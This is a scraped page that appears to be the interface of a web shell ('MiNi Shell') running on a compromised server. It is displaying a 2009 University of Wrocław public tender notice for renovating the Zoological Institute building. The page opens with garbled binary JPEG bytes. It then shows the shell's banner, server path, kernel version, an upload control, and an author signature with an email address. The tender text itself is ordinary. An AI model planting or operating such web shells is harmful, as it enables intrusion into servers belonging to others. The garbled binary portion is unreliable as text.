JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090810/271952-N-2009.html

<p class="kh_header"><b>Wrocław: Remont skrzydła północnego i Akwarium budynku Instytutu Zoologicznego  Uniwersytetu Wrocławskiego przy ul. Sienkiewicza 21 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 271952 - 2009; data zamieszczenia: 10.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bzp.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont skrzydła północnego i Akwarium budynku Instytutu Zoologicznego  Uniwersytetu Wrocławskiego przy ul. Sienkiewicza 21 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z remontem skrzydła północnego i Akwarium budynku Instytutu Zoologicznego Uniwersytetu Wrocławskiego przy ul. Sienkiewicza 21 we Wrocławiu.
Informacja ogólna: Budynek pięciokondygnacyjny niepodpiwniczony, z dobudowanym budynkiem parterowym podpiwniczonym tzw. Akwarium. 
ZAKRES ROBÓT:
1. Branża budowlana:
a. wymiana istniejących ścian działowych pomieszczeń biurowych,
b. wymiana i montaż sufitów podwieszonych w korytarzach dwóch kondygnacji i w łączniku na parterze
c. wymiana uszkodzonych posadzek poziomu przyziemia,
d. zabudowy pionów instalacyjnych płytami gips-kartonowymi,
e. wymiana drzwi na klatce schodowej,
f. dostosowanie wysokości balustrady schodowej do normatywnej,
g. pogłębienie poziomu posadzki piwnic i remont istniejących schodów   piwnicznych i  schodów prowadzących na strych w tzw. Akwarium;
h. roboty posadzkarskie;
i. wymiana stolarki okiennej i drzwiowej w budynku Akwarium;
j. przebicie otworu drzwiowego w ścianie łączącej budynek główny z budynkiem          Akwarium wraz z wykonaniem nadproża stalowego;
k. zamurowanie istniejącego przejścia pomiędzy ww budynkami;
l. remont powierzchni ścian i sufitów;
m. remont powierzchni schodów;
n. przebicia i przejścia przez stropy i ściany dla prowadzenia instalacji;
o. montaż klapy dymowej nad klatką schodową.
2. Branża elektryczna:
a. instalacje elektryczne zasilanie (WLZ i tablice),
b. instalacje gniazd wtykowych,
c. instalacje oświetleniowe,
d. instalacje siłowe elektryczne wentylacji,
e. instalacje oddymiania,
f. instalacje połączeń wyrównawczych,
g. instalacje SAP :
- demontaż istniejącej instalacji SAP w całym budynku;
- wykonanie Interaktywnej Instalacji Systemu Pożaru, w tym:
-  instalację centrali wraz z zasilaniem,
-  instalację interaktywnych linii dozorowych pętlowych klasy A w oparciu optyczne - optyczno-termiczne detektory pożaru, stanowiące automatyczny układ wyzwalania,
-  instalację ręcznych ostrzegaczy pożarowych, stanowiących nieautomatyczny układ wyzwalania,
-  instalację sygnalizatorów akustycznych,
- doprowadzenie sygnałów sterujących do centralek oddymiania klatek schodowych,
- montaż centralek oddymiania wraz z przyciskami wyzwalającymi,
-  montaż siłowników na oknach i klapach oddymiających,
- przeprowadzenie pomiarów i uruchomienie systemu
h. instalacja okablowania strukturalnego;
i. instalacja telefoniczna i domofonowa.
3.Branża sanitarna :
a. instalacje wodne,
b. kanalizacja sanitarna,
c. centralne ogrzewanie i ciepło technologiczne,
d. wentylacja mechaniczna.
SZCZEGÓŁOWY ZAKRES ROBÓT OPISUJE:
1) Dokumentacja projektowa, obejmująca:
a. Projekty wykonawcze (załączniki nr 5 -10 do SIWZ)
b. Przedmiary robót (załączniki nr 11 -15 do SIWZ)
2) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załączniki nr 16 -20 do SIWZ),.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.30.00.00-0, 45.31.11.00-1, 45.31.20.00-7, 45.31.21.00-8, 45.42.11.46-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 30 000,00 PLN (słownie: trzydzieści tysięcy złotych).Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do terminu składania ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Bankowy dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do terminu składania ofert. Kopię należy dołączyć do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać sie Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Pzp oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy Pzp :
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tzn.:
	2.1.) wykażą się wykonaniem w okresie ostatnich pięciu lat (przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia):
a) min. 2 robót  budowlanych, należycie wykonanych, o wartości co najmniej 1.000 000,00 zł brutto każda, polegających na remoncie budynku, w zakres którego wchodził remont lub wykonanie nowej instalacji Systemu Sygnalizacji Pożaru, z czego, co najmniej 1 z 2 wykazanych robót wykonana była w obiekcie wpisanym do rejestru zabytków. 
b)  za spełnienie warunku Zamawiający uzna również  wykazanie się jedną należycie wykonaną robotą budowlaną o wartości co najmniej  1 800 000 zł brutto, polegającą na remoncie obiektu wpisanego do rejestru zabytków, w zakres którego wchodził remont lub wykonanie nowej instalacji Systemu Sygnalizacji Pożaru,  
2.2.)  dysponują  osobami (lub osobą) posiadającymi :
a)  uprawnienia budowlane bez ograniczeń do wykonywania samodzielnych funkcji       technicznych w budownictwie - kierownika budowy i kierowników robót, (wydane na podstawie rozporządzenia Ministra Transportu i Budownictwa  z dnia    28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U.06.83.578), w specjalnościach:
- konstrukcyjno-budowlanej (kierownik budowy),
- instalacyjnej w zakresie: sieci, instalacji i urządzeń cieplnych, wentylacyjnych,   gazowych, wodociągowych i kanalizacyjnych (kierownik robót sanitarnych),  
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych (kierownik robót elektrycznych).
	lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994 - Prawo budowlane (t.j. Dz. U. 06.156.1118 ze zm.), odpowiednio w zakresie :
- konstrukcyjno-budowlanej (kierownik budowy),
- instalacji i urządzeń cieplnych, wentylacyjnych,   gazowych, wodociągowych i kanalizacyjnych (kierownik robót sanitarnych)
- instalacji i urządzeń elektrycznych i elektroenergetycznych (kierownik robót elektrycznych)
b)  aktualny na dzień składania ofert wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez izbę, zgodnie z ustawą  z dnia 15 grudnia 2000 o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (DZ.U. z 2001 r. Nr 5, poz. 42 ze zm.)
Osobami, wskazanymi przez Wykonawcę do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, mogą być również osoby,  których kwalifikacje zostały uznane zgodnie z art. 12 a  ustawy z dnia 7 lipca 1994 Prawo budowlane (tj. DZ.U. z 2006 r. Nr 156, poz. 1118 ze zm.)
c) ponadto kierownik budowy, który będzie uczestniczyć w wykonywaniu niniejszego zamówienia, winien posiadać co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych, na podstawie § 8 ust. 1 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytkach wpisanych do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych, DZ.U. z 2004 r. Nr 150, poz. 1579).
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tzn. wykażą, że dysponują środkami finansowymi lub zdolnością kredytową na kwotę nie niższą niż 400.000 PLN;
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna warunki za spełnione, gdy:
1) Wykonawca przedłoży wszystkie wymagane dokumenty i oświadczenia,
2) przedłożone dokumenty będą zgodne z wymogami:
- rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz.605),
- niniejszej Specyfikacji Istotnych Warunków Zamówienia.
Spełnienie warunków, o których mowa powyżej, stanowić będzie podstawę dopuszczenia złożonej oferty do badania pod kątem spełnienia wymagań merytorycznych i technicznych oferowanego przedmiotu zamówienia, a w przypadku pozytywnego wyniku tego badania do oceny według wskazanych w SIWZ kryteriów oceny ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - Załącznik nr 2 do SIWZ.
4. Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp - Załącznik nr 3 do SIWZ.
5. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swym rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz dat i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te  zostały wykonane należycie, zgodnie z Załącznikiem nr 21 do SIWZ.
Należy wykazać spełnienie warunku określonego w Rozdziale V, pkt  2.1.SIWZ.
6. Wykaz osób, którymi dysponuje lub będzie dysponował* Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Wykaz należy sporządzić zgodnie ze wzorem określonym w Załączniku nr 22 do SIWZ. Zamieszczone w nim informacje oraz dołączone dokumenty: 
a) uprawnienia budowlane;  
b) aktualne zaświadczenia o przynależności osób wskazanych w wykazie do właściwej izby samorządu zawodowego, 
w sposób bezsporny muszą potwierdzać spełnianie warunku, o którym mowa w Rozdziale V pkt 2.2. SIWZ.
Dokumenty stwierdzające, że osoby które będą wykonywać zamówienie, posiadają uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994 Prawo budowlane (t.j. DZ.U. z 2006 r. Nr 156, poz. 1118 ze zm.) oraz aktualnie  obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tj. DZ.U. z 2006 r. Nr 83, poz. 578)
*W przypadku wskazania  w wykazie, o którym mowa w pkt 6, osób, którymi Wykonawca będzie dysponował, należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
7. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych* lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8. W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.
9. W przypadku złożenia wspólnej oferty przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w Rozdziale VI pkt 1, 2, 4 SIWZ.
Dokumenty wymienione w Rozdziale VI pkt 3, 5, 6, 7 SIWZ podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy podmioty składające wspólną ofertę spełniają je łącznie.
10. Jeśli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów określonych w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. nr 87, poz. 605 ze zm.) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2009 godzina 10:00, miejsce: Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej.

Creat By MiNi SheLL
Email: jattceo@gmail.com